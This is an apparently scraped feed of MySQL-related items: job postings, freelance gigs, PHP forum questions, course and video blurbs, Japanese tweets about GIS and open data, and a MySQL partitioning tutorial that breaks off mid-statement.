
          Senior Mobile Developer - REACT - MatchBox Consulting Group - Burnaby, BC
.net core/Java for middleware, MS SQL/MySQL RDS. MatchBox Consulting Group is currently searching for a Senior Developer - REACT to be part of a SCRUM team and... $95,000 a year
From MatchBox Consulting Group - Fri, 22 Jun 2018 08:15:00 GMT - View all Burnaby, BC jobs
          Sr Software Developer (Mobile App - Reactive) (7491258) - emergiTEL Inc. - Burnaby, BC
.net core/Java for middleware, MS SQL/MySQL RDS. Leads design, development and documentation of a complex and comprehensive product suite.... $80,000 - $100,000 a year
From EmergiTel Inc. - Wed, 20 Jun 2018 06:49:20 GMT - View all Burnaby, BC jobs
          Software Developer Analyst - Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:19 GMT - View all Burnaby, BC jobs
          Senior Software Developer Analyst - Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:18 GMT - View all Burnaby, BC jobs
          Lynda.com: MySQL for Advanced Analytics: Tips, Tricks, & Techniques
MySQL is an excellent database for advanced analytics, but few analysts use it that way because they aren't fully aware of its capabilities in this area. Analysts end up writing code to perform common tasks—which can be time-consuming—rather than using MySQL to do the same work. In this course, learn tips and techniques for using MySQL for advanced data analytics. Kumaran Ponnambalam walks through the different stages of analytics, from data ingestion and transformation to generating statistics. In each stage, Kumaran focuses on letting MySQL do the heavy lifting rather than writing code in Java or Python. Discover how to perform data cleansing through MySQL update commands, find peak usage of any resource, perform centering and scaling of data to prepare for machine learning, and more. Plus, Kumaran shows how you can link MySQL with Microsoft Excel to get the best of both worlds.
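For a taste of what that looks like in practice, here is a hedged sketch of the kind of statements the course describes (the usage_log table and its columns are invented for illustration, not taken from the course):

-- Data cleansing with a plain UPDATE:
UPDATE usage_log SET country = 'Unknown' WHERE country IS NULL OR country = '';

-- Centering and scaling a metric (z-score) entirely inside MySQL:
SELECT user_id,
       (bytes_used - (SELECT AVG(bytes_used) FROM usage_log))
         / (SELECT STDDEV_POP(bytes_used) FROM usage_log) AS bytes_used_z
FROM usage_log;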
          Build A Basic CRM Portal
Manolo Portal Wishes Overall Features Manolo Bot is a creative way to communicate on behalf of manolo. (Used for all notifications and communication in the portal) User Management Login Verification... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, WordPress)
          Amazon MWS API Expert
*** DONT BID INDIAN, PAKISTAN *** Looking for an experienced programmer to do some work on a web application. Amazon MWS experience is mandatory. You will be fixing a few issues, connecting a form... (Budget: $250 - $750 USD, Jobs: Amazon Web Services, Linux, MySQL, PHP, Software Architecture)
          Hashed password not inserting into mysql database
Forum: PHP Posted By: whizzbang Post Time: Jul 10th, 2018 at 05:37 AM
          I primarily build websites in a CMS
I am a web developer and Designer with 10+ years worth of experience in HTML5, CSS3, PHP, WORDPRESS, MYSQL, LARAVEL, BOOTSTRAP, JQUERY/JAVASCRIPT. I help local businesses to build and maintain their websites. If you have an existing website or need a new one, I will take your idea and be creative wi
          Experienced in SEO and an expert in all aspects
I am a web developer and Designer with 10+ years worth of experience in HTML5, CSS3, PHP, WORDPRESS, MYSQL, LARAVEL, BOOTSTRAP, JQUERY/JAVASCRIPT. I help local businesses to build and maintain their websites. If you have an existing website or need a new one, I will take your idea and be creative wi
          Web Developer / Designer / Update Existing Website
I am a web developer and Designer with 10+ years worth of experience in HTML5, CSS3, PHP, WORDPRESS, MYSQL, LARAVEL, BOOTSTRAP, JQUERY/JAVASCRIPT. I help local businesses to build and maintain their websites. If you have an existing website or need a new one, I will take your idea and be creative wi
          Use a checkbox to update a mysql table

I display a form which shows every record from my mysql table


I'm trying to turn the display field for the record to either 1 or 0 (depending on if the box is checked or not)
I got the form to display

	while($row = $stmt->fetch()) {

		// Pre-compute the checkbox state: display == 1 means "checked"
		switch($row['display']) {
			case 1:
				$display = 'checked';
				break;
			default:
				$display = '';
				break;
		}

		echo '<tr>';
		echo '<td>'.$row['id'].'</td>';
		echo '<td>'.$row['userName'].' ('.$row['userID'].')</td>';
		echo '<td><input type="hidden" name="userID['.$row['id'].']" value="'.$row['id'].'"><input type="checkbox" name="display['.$row['id'].']" value="'.$row['display'].'" '.$display.'></td>';
		echo '</tr>';
		echo "\r\n";
	}

But how do I make it so that once the form is submitted, I only change the changed display property (1 or 0) in the MySQL table?

Thanks
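For reference, a minimal sketch of the SQL this usually boils down to (the users table, its columns and the example ids are hypothetical; the PHP that reads the posted display[]/userID[] arrays and builds the id list is omitted):

-- Suppose ids 3, 7 and 12 arrived checked in $_POST['display']; everything else is unchecked.
-- Rows whose display value already matches are reported as 0 rows affected,
-- so only rows that actually changed get rewritten.
UPDATE users SET display = 1 WHERE id IN (3, 7, 12);
UPDATE users SET display = 0 WHERE id NOT IN (3, 7, 12);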


          Couldn't fetch mysqli

Thanks for your help. I have fixed the issue


          Faster multiple inner joins or simple select with repeated data

Hmmm, it's just a prototype. I haven't even done that yet. Just some tables I have put up and linked via their ids. I am going to download MySQL Workbench or some such to put together a decent schema.

Still, the idea of "do not repeat yourself" seemed like a flag to me.

At the most basic level, I will take your advice and not repeat myself. I will do the inner joins and come back to this space whenever I've got something better to present.

Thanks for your advice :slight_smile:


          Uniface Developer - Oscar Technology - Rossendale
Uniface Developer - Uniface - MySQL - Rossendale. Two Uniface Developers are required for a 6 month initial contract with my client....
From Oscar Technology - Thu, 05 Jul 2018 16:55:05 GMT - View all Rossendale jobs
          (5) Build Forms for Existing Website
I have an existing website and I am looking for a programmer who can add some extra functions to the existing web page. This project has to be finished and tested in one day. The existing page needs some forms that... (Budget: $10 - $20 CAD, Jobs: Javascript, MySQL, PHP, Website Design)
          Integration Architect - Silverline Jobs - Casper, WY
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Casper, WY jobs
          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          Software Developer - State of Wyoming - Cheyenne, WY
Preference may be given to those with experience in MS SQL Server or MYSQL. This position is to provide development support in the design and implementation of... $4,506 - $5,632 a month
From State of Wyoming - Thu, 28 Jun 2018 20:49:57 GMT - View all Cheyenne, WY jobs
          Integration Architect - Silverline Jobs - Cheyenne, WY
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Cheyenne, WY jobs
          Technical Architect (Salesforce experience required) Cheyenne - Silverline Jobs - Cheyenne, WY
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Fri, 30 Mar 2018 06:14:53 GMT - View all Cheyenne, WY jobs
          How I Scaled a Website to 10 Million Users (Web-Servers & Databases, High Load, and Performance)
Ex-Google Tech Lead Patrick Shyu talks about scalability, and how he grew a website to handle 10 million users (per month). I cover load balancing, content delivery networks, mysql query optimization, database master/slave replication, horizontal/vertical sharding, and more.
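For flavour, a hedged sketch of two of those techniques in MySQL terms (table names, hosts and credentials below are invented, not taken from the video):

-- Query optimization: add a covering index, then check the plan with EXPLAIN.
ALTER TABLE page_views ADD INDEX idx_user_created (user_id, created_at);
EXPLAIN SELECT COUNT(*) FROM page_views
WHERE user_id = 42 AND created_at >= '2018-07-01';

-- Master/slave replication: point a replica at the master and start it
-- (binlog coordinates come from SHOW MASTER STATUS on the master).
CHANGE MASTER TO
  MASTER_HOST='10.0.0.1', MASTER_USER='repl', MASTER_PASSWORD='secret',
  MASTER_LOG_FILE='mysql-bin.000001', MASTER_LOG_POS=4;
START SLAVE;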
          today's howtos


          Developer
VA-McLean, McLean, Virginia
Skills:
- 7+ years of experience programming in Java application development
- 3+ years of experience with Java, RESTful APIs, Spring/Spring Boot, Hibernate, etc.
- 3+ years of experience with web services such as SOAP, REST and JSON, and with database technologies (MySQL, SQL)
- 2+ years of experience with Agile practices
Description: Solid experience in emerging and traditional
          Tweets from Monday, July 9 (Part 2)

【酪農学園大GIS研究室が環境大臣表彰受賞】

 酪農学園大学農食環境学群環境共生学類環境GIS研究室(金子正美教授)が、平成30年度の地域環境保全功労者環境大臣表彰を受賞し、6月29日(金曜日)、三好昇市長に受賞を報告しまし… twitter.com/i/web/status/1…

— 江別なう (@ebetsucity_now) 2018年7月3日 - 15:33

GIS活用の利点その1:空間情報の可視化。地図は多くの情報を視覚的にわかりやすく伝達できる媒体です。地図上に可視化すると、現状の理解、問題の発見、分析、プレゼン等に役立ちます。これは東京都の町丁単位の地震による建物倒壊危険度。高い… twitter.com/i/web/status/1…

— Mizuki Kawabata 河端瑞貴 (@mizuki_kawabata) 2018年7月2日 - 09:06

GIS活用の利点その2:空間情報の加工と作成。位置情報をキーに複数のデータを統合したり、データを加工することで、新しいデータを作成できます。たとえば「最寄り駅までの距離」、「公園隣接ダミー」、「半径○○以内の緑地面積」といった変数を作成し、モデルに入れて分析できます。

— Mizuki Kawabata 河端瑞貴 (@mizuki_kawabata) 2018年7月2日 - 09:07

GIS活用の利点その3:空間情報の分析。高機能なGISには多数の分析ツールが実装されています。これは残差のホットスポット(高い値の集積地)とコールドスポット(低い値の集積地)。重要な変数を見つけ出すヒントを与えてくれます。 pic.twitter.com/alscnuHrfi

— Mizuki Kawabata 河端瑞貴 (@mizuki_kawabata) 2018年7月2日 - 09:08

来週(今週末)のOSC北海道向けの準備を着々と進めていて(久々に資料をガッツリ作る系)、結構良い感じになってきたので楽しみ。1年後にはこんな内容は(基礎的すぎて)話せない状況になっていて欲しいけど、今はMySQLでのGIS利用(学習)の一歩としてピッタリと思う。

— 坂井 恵(SAKAI Kei) (@sakaik) 2018年7月2日 - 00:54

フリー&オープンなGISの祭典「FOSS4G TOKAI 2018」セッション | Peatix foss4g-tokai-coreday.peatix.com

日時: 2018年8月25日(土) 10:00〜17:00 (受付9:30〜)
会… twitter.com/i/web/status/1…

— niwasawa 迷子 (@niwasawa) 2018年7月1日 - 22:16

2018年8月25日(土) 10:00〜17:00:愛知大学 名古屋キャンパス / “フリー&オープンなGISの祭典「FOSS4G TOKAI 2018」セッション | Peatix” htn.to/pArYqi #GISevents #foss4gj

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:18

「FOSS4G TOKAI 2018」:fc2.to/17dkEL:【ブログ更新】#GISevents:「GIS(地理情報システム)活用推進ブログ」

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:21

会津若松市の職員向けオープンデータQ&Aが面白い。「ネタ募集中」って何だよw 【PDF】 city.aizuwakamatsu.fukushima.jp/docs/200912240… pic.twitter.com/kWEIvQGUBw

— Shuji Ishida (@ishidashuji) 2018年7月9日 - 21:30

まちのデータ研究室『地域情報利活用アプリ開発講座』
オープンデータ等の取り込みから、蓄積・加工・可視化および、データに基づく知識発見に至るまでの一連のデータ利活用プロセスを体験します。… twitter.com/i/web/status/1…

— e-とぴあ・かがわ (@etopiakagawa) 2018年7月8日 - 12:46

高松市や香川県が提供しているオープンデータ等の地域情報(データ)を利用し、様々な視点から可視化できるソフトウェア(アプリ)の開発を全12回のコースで学びます。 / “まちのデータ研究室|情報通信交流館…” htn.to/ymRVW8 #オープンデータevent

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:24

『地域情報利活用アプリ開発講座』:fc2.to/lmsHRZ:【ブログ更新】#オープンデータevents#opendata:うじじす@オープンデータeventブログ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:28

国土交通省系の(一財)河川情報センターが有償提供している雨量・水位などの「オープンデータ」。それは本当にオープンといえるのかという指摘や「実費」が高いのではという指摘があり、僕もその指摘は正しいのではないか、検証が必要ではないかと… twitter.com/i/web/status/1…

— 庄司昌彦, Masahiko Shoji (@mshouji) 2018年7月6日 - 08:42

こんにちは!稲継ゼミです🤗
2年生の皆さんは、そろそろどのゼミに入るか考え始める頃かと思います🤔💭そこでお知らせです🌟

【稲継ゼミ オープンゼミ】
日時:7/10(火) 5限
場所:3-606
内容:"オープンデータ"を用いて、… twitter.com/i/web/status/1…

— 2018 稲継ゼミ*早稲田政経 (@inatsugu19) 2018年6月13日 - 12:07

それでも気になる、河川の水位。鯖江市では、さくらインターネット協力により、省電力広域無線(LPWA)の一種、"LoRa"を使った水位計測IoTのリアルタイムオープンデータをアプリと共に公開。 htn.to/FSU7Bd #災害情報 #オープンデータ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:32

水防災オープンデータ提供サービスについて − 利用規定 river.or.jp/01suuchi/img/0… には
>(3)第三者への配信やサービスの提供を有償で行うことができる。
>(4)受信した数値データを無加工で第三者へ二次配信することはできない。
とある。

— あめいぱわーにおまかせろ! (@amay077) 2018年7月6日 - 10:51

ちょっと川を見てくるをIoT化!
LoRaを使って鯖江市内6箇所で実験中の格安水位計測IoT&リアルタイムオープンデータ、データシティ鯖江で公開スタート
fukuno.jig.jp/2173

— 福野泰介 (@taisukef) 2018年7月6日 - 09:54

第4回目となる「CIVIC TECH FORUM」が2018年6月2日、東京都内で開催された。 / “地域課題の解決を目指す50の取り組みが競演 | 新・公民連携最前線 PPPまちづくり” htn.to/JjyhU #シビックテック #オープンデータ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:35

【7/31(火)香川】まちのデータ研究室 地域情報利活用アプリ開発講座 応募締切
e-topia-kagawa.jp/kouza/towndata…
8/18(土)~3/9(日) 定員20名
"高松市や香川県が提供しているオープンデータ等の地域情報(… twitter.com/i/web/status/1…

— 鎌玉 大 (@kamatamadai) 2018年7月5日 - 02:10

発表者と討論者(僕)は、特定の目的を持って公開するのは本来のオープンデータの趣旨と違うよねという話をしたと記憶してますが、伝わらなかったのかな。異論あるならその場で言ってくれればいいのに。 twitter.com/hirokoyamamoto…

— 庄司昌彦, Masahiko Shoji (@mshouji) 2018年7月4日 - 20:53

《データの「今」》
「自由に見ることができるのは当然で、それに加えて何をしてもいいように「開放」されたデータがオープンデータです。」内閣官房 オープンデータ伝道師 庄司昌彦 #データのじかん
buff.ly/2M8FYzK

— データのじかん (@datanojikan) 2018年7月2日 - 18:30

IoTとビッグデータ・オープンデータを考える ~IoTとデータ活用で価値創造への挑戦~:fc2.to/237bCY:【ブログ更新】#オープンデータevents#opendata:うじじす@オープンデータeventブログ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:40

International Workshop on Data Science 2018:fc2.to/pvyLRS:【ブログ更新】#オープンデータevents#opendata:うじじす@オープンデータeventブログ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:46

Asia Open Data Hackathon:fc2.to/3dwGSW:【ブログ更新】#オープンデータevents#opendata:うじじす@オープンデータeventブログ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:50

平成30年6月27日(水曜)に、PlanT 多摩平の森産業連携センターにおいて明星大学と多摩5市(八王子市・町田市・日野市・多摩市・稲城市)でオープンデータイベント(アイデアソン)を開催しました / “明星大学…” htn.to/6EFh5HJ #オープンデータ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:50

国立国会図書館デジタルコレクション書誌情報のオープンデータセットを更新しました。
ndl.go.jp/jp/dlib/standa…

— 国立国会図書館 NDL (@NDLJP) 2018年7月2日 - 14:40

“国立国会図書館デジタルコレクション書誌情報” / “オープンデータセット|国立国会図書館-National Diet Library” htn.to/7ZEpvwG #図書館 #オープンデータ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:52

“両丹日日新聞 : 公立大がシクロタクシー 高齢者支援や観光案内” htn.to/q2Yri9 #福知山市

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:55
          Tweets from Monday, July 9 (Part 1)

Data(Driven) Journalism post 紙が更新されました! paper.li/ujigis/1389940… おかげで @Ali_Tehrani @fpiccato @MediaEu #journalism #data

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 06:42

記録的豪雨。広島県、岡山県の全容把握はこれから?
災害救助法適用された7府県の災害報から市町村別の被害をスプレッドシートにまとめました。>7府県被害状況まとめ(7/7現在) gensaiinfo.com/blog/disaster/…twitter.com/i/web/status/1…

— 減災インフォ (@gensaiinfo) 2018年7月8日 - 05:28

ujigis opendata Times 紙が更新されました! paper.li/ujigis/1387861… おかげで @lamachineacafe @docfranzke @oliverrack #opendata #bigdata

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 19:58

今津勝紀先生の研究成果の一部 cc.okayama-u.ac.jp/~kimazu/map/ma… GISで利用できる旧国日本地図(shapeファイル)などもあります。

— 山口欧志 (@H_Y77) 2013年2月22日 - 18:04

旧国日本地図 (shape版) 、旧国日本地図(古代) (shape版) 、備中国郡図 (shape版) / “今津勝紀の研究と教育” htn.to/eAWCPk #HistoricalGIS

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:27

#リアルタイム GIS を実現する ArcGIS GeoEvent Server ~ SNS とつながる! #Twitter 上のつぶやきを地図で可視化 - blog.esrij.com/2018/07/06/pos… pic.twitter.com/CmC2g0dOOe

— ESRIジャパン ブログ (@EsriJapanBlog) 2018年7月6日 - 19:00

地盤、地質、GIS、建機あたり強めですね。

— トレンド銘柄のK.K (@analyzesoon) 2018年7月9日 - 08:43

「絵図は情報の玉手箱。作成時の時代背景や作成者の意図,測量技術の巧拙など,最新のGIS技術を駆使して近世測量絵図を読み解く」琉球王国・徳島藩・加賀藩(金沢)ほか。
⇒平井松午、安里進、渡辺誠編『近世測量絵図のGIS分析』古今書院kokon.co.jp/book/b166056.h…

— 猫の泉 (@nekonoizumi) 2014年2月14日 - 22:54

歴史地理学・地図史などの研究者15名による歴史GIS研究の成果。 / “近世測量絵図のGIS分析 - 古今書院 Since1922 地理学とともに歩む” htn.to/yFoWzHZ #HistoricalGIS

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:43

宇宙APIのサイトをご紹介します!

◆宇宙ディレクトリ
無償公開されている衛星データと、利用に必要なGISデータ、アプリケーションなどを揃えました早見表で各データを比較することができます。 spaceapi.info/spacedirectory/

— 宇宙ビジネスコート/Space Business Court (@SpaceBizCourt) 2018年7月8日 - 09:00

「GIS]“宇宙ディレクトリ 無償公開されている衛星データと、利用に必要なGISデータ、アプリケーションなどを揃えました早見表で各データを比較することができます” / “宇宙ディレクトリ|宇宙API” htn.to/NGPeog #地理空間情報

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:45

【北海道公式ウェブサイト】【オープンデータ活用事例】「ひなたGIS」に北海道森林情報が追加されました。【総合政策部 情報統計局情報政策課】
pref.hokkaido.lg.jp/ss/jsk/opendat…
#CCBY

— 北海道 (@PrefHokkaido) 2018年7月6日 - 15:52

OSC2018北海道でのセミナー資料公開しました。「MySQLに本格GIS機能がやってきた」
slideshare.net/sakaik/mysqlgi… #mysql_jp #osc18do

— 坂井 恵(SAKAI Kei) (@sakaik) 2018年7月7日 - 18:33

“MySQLに本格GIS機能がやってきた~MySQL8.0最新情報~” htn.to/QjVyJS #GIS #MySQL

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:47

NHKってGIS扱える人いないのかな?
この図から正確な降水量を理解するのは難しいし、日本海側の降水量は見えない。 pic.twitter.com/dUcUvywIZf

— はーつくらい (@_HeartsCry) 2018年7月7日 - 09:42

斎藤英二 (2017) 日本列島下の海洋プレートのGISデータ作成. 地質調査総合センター研究資料集,no. 647,産総研地質調査総合センター
gsj.jp/researches/ope…
shapefile で公開されている… twitter.com/i/web/status/1…

— S.Hirano (@Bimaterial) 2018年7月6日 - 23:40

“データはShapefile、qgisおよびjsonであり、Web-GL対応ブラウザでみることもできる。” / “no. 647 / 日本列島下の海洋プレートのGISデータ作成|研究紹介|産総研地質調査…” htn.to/Baj88m #GIS #地理空間情報

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:52

防災科研のシステムと、県が開発した地理情報システム「ひなたGIS」とを連携させ、救援物資の支援が必要な場所の特定や、避難の呼び掛けなどが迅速に発信できるシステムを開発し、来年度からの導入を目指す
>災害情報システム開発へ 県、防災… twitter.com/i/web/status/1…

— 減災インフォ (@gensaiinfo) 2018年7月3日 - 22:33

AWSからオンデマンドサービスを提供するEO / GISトレーニングラボ/EO/GIS Training Lab with On-demand Services from AWS zpr.io/6sGSP

— 吉田真吾 / CYDAS (@yoshidashingo) 2018年7月6日 - 03:23

告知しそびれてたので、こっちもついでに宣伝。こちらは関学のリポジトリで全文公開されています。
波江彰彦(2017.12)「地理学を専攻しない学生を対象とする地理情報システム(GIS)教育の実践と課題―甲南大学文学部における授業を事… twitter.com/i/web/status/1…

— 波江彰彦 (@namie_ak) 2018年7月5日 - 23:48

昨日獨協大学地域総合研究所の研究会にて、所長の倉橋先生にお声掛けいただき、「都市地域研究におけるGISの活用-女性就業と通勤時間ー」について講演しました。研究、教育、政策におけるGISの活用法等について、参加者の皆様と有益な議論ができました。

— Mizuki Kawabata 河端瑞貴 (@mizuki_kawabata) 2018年7月5日 - 13:22

酪農学園大学の環境GIS研究室が「平成30年度地域環境保全功労者」環境大臣表彰を受賞 -- 小学校向けの出前授業「巨大空中写真に見る江別の環境」など環境教育活動が評価 u-presscenter.jp/2018/07/post-3…

— 大学プレスセンター (@u_presscenter) 2018年7月5日 - 10:05

【事例】西日本高速道路エンジニアリング九州株式会社では、高速道路の点検業務にArcGISを活用し、現場調査員がタブレット端末でGISを利用しています。ArcGISの導入により、作業の準備から点検作業、点検後のデータ管理など、一連の… twitter.com/i/web/status/1…

— ESRIジャパン (@ESRIJapan) 2018年7月4日 - 19:30

#日本の滝100選 にも選ばれている大分県の原尻の滝をドローンで撮影し、Drone2Map for ArcGISで3Dデータを作成しました。Drone2Map for ArcGISは専門知識不要で簡単に撮影画像からGISデータを作… twitter.com/i/web/status/1…

— ESRIジャパン (@ESRIJapan) 2018年7月4日 - 12:00

MySQL 8.0はGIS、RDBとNoSQLのハイブリッド、API、データ分析/処理/耐障害性/セキュリティ機能を強化。Oracle Labsからは「MySQL Autonomous DB」構想が語られ、自動チューニングによりM… twitter.com/i/web/status/1…

— いとうちひろ(Chihiro Ito) (@chiroito) 2018年7月4日 - 11:47

第57回古代山城研究会「古代山城とノロシ~高速軍事通信の実態 ~」:ujigis.blog.fc2.com/blog-entry-182…:【ブログ更新】#GISevents:「GIS(地理情報システム)活用推進ブログ」

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:11

奈良大学は、平成30年度 奈良大学学校教員研修支援オープン講座として、「GIS講座」を、2018年8月3日(金)に開催します。
2022年、GIS(Geographic Information System:地理情報シス ... – is.gd/t3vqgX

— 教育家庭新聞 (@kyoikukatei) 2018年7月3日 - 15:59

新学習指導要領への移行準備やGIS導入事例、実習による教員サポートを行います。 / “奈良大学学校教員研修支援オープン講座「GIS講座」8月3日開講|KKS Web:教育家庭新聞ニュース|教育家庭新聞社” htn.to/7QS7xGg #GIS教育

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:13

奈良大学学校教員研修支援オープン講座「GIS講座」:fc2.to/1grBKX:【ブログ更新】#GISevents:「GIS(地理情報システム)活用推進ブログ」

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:14

第1回入ゼミ説明会にてPEARL生はゼミに入れますか?という質問がいくつか見られました!
①日本語で進行するゼミに問題なく参加できる方
②PEARL生は河端教授の経済地理を履修できないため、自主的にGISの勉強を行える方
の2つの… twitter.com/i/web/status/1…

— 河端瑞貴研究会 (@kwbt_seminar) 2018年7月3日 - 15:44
          MySQL Database Administrator - Clio - Vancouver, BC
We could talk to you about our ping pong table, beer taps, yoga classes, and nap room, but, we know you’re looking for more than that....
From Clio - Tue, 10 Jul 2018 22:33:03 GMT - View all Vancouver, BC jobs
          Technical Lead (PHP & MySQL) - Vanilla - Montréal, QC
Excellent communication skills are critical whether you’re talking to a developer or anyone else in the company....
From Vanilla - Thu, 29 Mar 2018 23:13:58 GMT - View all Montréal, QC jobs
          Technical Lead (PHP & MySQL) - Vanilla - Montréal, QC
High-traffic web properties. Vanilla is looking for a talented and creative Technical Lead / Software Architect who wants to join a profitable and rapidly...
From Vanilla - Thu, 29 Mar 2018 23:13:58 GMT - View all Montréal, QC jobs
          Jobs: C# Programmer – São Leopoldo, RS

C# programmer; knowledge of MVC, SQL Server, MySQL, JavaScript and Xamarin is essential. Requirements: experience with the technologies mentioned. Working hours: Monday to Friday, 8 am to 6 pm. Salary in the range of R$ 3,500.00. Benefits: transport vouchers (VT); meal vouchers (VR); life insurance; health plan.

The post Jobs: C# Programmer – São Leopoldo, RS appeared first on Emprega Sul.


          Marten Mickos of MySQL on building Open Source Software businesses
I had the privilege of attending an informal presentation by Marten Mickos, CEO of MySQL, last week at SAP Labs. Marten was his usual candid self, and spoke frankly about the challenges of making money in Open Source, why MySQL...
          Importing XML into MySQL
Hi, let's see if one of you can get me out of...
          What is MySQL partitioning?
MySQL partitioning distributes the data of an individual table across multiple files according to a partitioning strategy or set of rules (we typically recommend partitioning large tables with complex I/O, for performance, scalability and manageability). In very simple terms, different portions of the table are stored as separate tables in different locations so that I/O is distributed optimally. The user-defined division of data by some rule is known as the partitioning function; in MySQL we partition data by a RANGE of values, a LIST of values, an internal hashing function, or a linear hashing function.

Restricting query examination to the partitions that can contain matching rows makes a query many times faster than the same query against a non-partitioned table. This methodology is called partition pruning (trimming of unwanted partitions). Here is an example of partition pruning:

CREATE TABLE tab1 (
    col1 VARCHAR(30) NOT NULL,
    col2 VARCHAR(30) NOT NULL,
    col3 TINYINT UNSIGNED NOT NULL,
    col4 DATE NOT NULL
) PARTITION BY RANGE( col3 ) (
    PARTITION p0 VALUES LESS THAN (100),
    PARTITION p1 VALUES LESS THAN (200),
    PARTITION p2 VALUES LESS THAN (300),
    PARTITION p3 VALUES LESS THAN MAXVALUE
);

A SELECT query benefitting from partition pruning:

SELECT col1, col2, col3, col4 FROM tab1 WHERE col3 > 200 AND col3 < 250;
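A quick way to see pruning in action is EXPLAIN; in MySQL 5.7 and later the partitions column of the output lists the partitions that will actually be read (a small sketch against the tab1 table above):

-- Only partition p2 should appear in the partitions column,
-- since every row with 200 < col3 < 250 lives in p2.
EXPLAIN SELECT col1, col2, col3, col4 FROM tab1 WHERE col3 > 200 AND col3 < 250;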
What is explicit partition selection in MySQL and how is it different from partition pruning? In MySQL we can explicitly select partitions and subpartitions when executing a statement matching a given WHERE condition. This sounds very similar to partition pruning, but there is a difference: the partitions to be checked are named explicitly in the statement, whereas with partition pruning the selection is automatic. In addition, explicit partition selection is supported for both queries and DML statements, while partition pruning applies only to queries.

SQL statements that support explicit partition selection: SELECT, INSERT, UPDATE, DELETE, LOAD DATA, LOAD XML and REPLACE.

Explicit partition selection example:

CREATE TABLE customer (
    cust_id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    cust_fname VARCHAR(25) NOT NULL,
    cust_lname VARCHAR(25) NOT NULL,
    cust_phone INT NOT NULL,
    cust_fax INT NOT NULL
) PARTITION BY RANGE(cust_id) (
    PARTITION p0 VALUES LESS THAN (100),
    PARTITION p1 VALUES LESS THAN (200),
    PARTITION p2 VALUES LESS THAN (300),
    PARTITION p3 VALUES LESS THAN MAXVALUE
);

Query explicitly naming a partition:

mysql> SELECT * FROM customer PARTITION (p1);

RANGE partitioning

With RANGE partitioning you partition on values falling within a given range. Ranges should be contiguous but not overlapping, and are usually defined with the VALUES LESS THAN operator. The following examples show how to create and use RANGE partitioning:

CREATE TABLE customer_contract (
    cust_id INT NOT NULL,
    cust_fname VARCHAR(30),
    cust_lname VARCHAR(30),
    st_dt DATE NOT NULL DEFAULT '1970-01-01',
    end_dt DATE NOT NULL DEFAULT '9999-12-31',
    contract_code INT NOT NULL,
    contract_id INT NOT NULL
) PARTITION BY RANGE (contract_id) (
    PARTITION p0 VALUES LESS THAN (50),
    PARTITION p1 VALUES LESS THAN (100),
    PARTITION p2 VALUES LESS THAN (150),
    PARTITION p3 VALUES LESS THAN (200)
);

For example, suppose that you wish to partition based on the year the contract ended:

CREATE TABLE customer_contract (
    cust_id INT NOT NULL,
    cust_fname VARCHAR(30),
    cust_lname VARCHAR(30),
    st_dt DATE NOT NULL DEFAULT '1970-01-01',
    end_dt DATE NOT NULL DEFAULT '9999-12-31',
    contract_code INT NOT NULL,
    contract_id INT NOT NULL
) PARTITION BY RANGE (YEAR(end_dt)) (
    PARTITION p0 VALUES LESS THAN (2001),
    PARTITION p1 VALUES LESS THAN (2002),
    PARTITION p2 VALUES LESS THAN (2003),
    PARTITION p3 VALUES LESS THAN (2004)
);

It is also possible to partition a table by RANGE based on the value of a TIMESTAMP column, using the UNIX_TIMESTAMP() function, as shown in this example:

CREATE TABLE sales_forecast (
    sales_forecast_id INT NOT NULL,
    sales_forecast_status VARCHAR(20) NOT NULL,
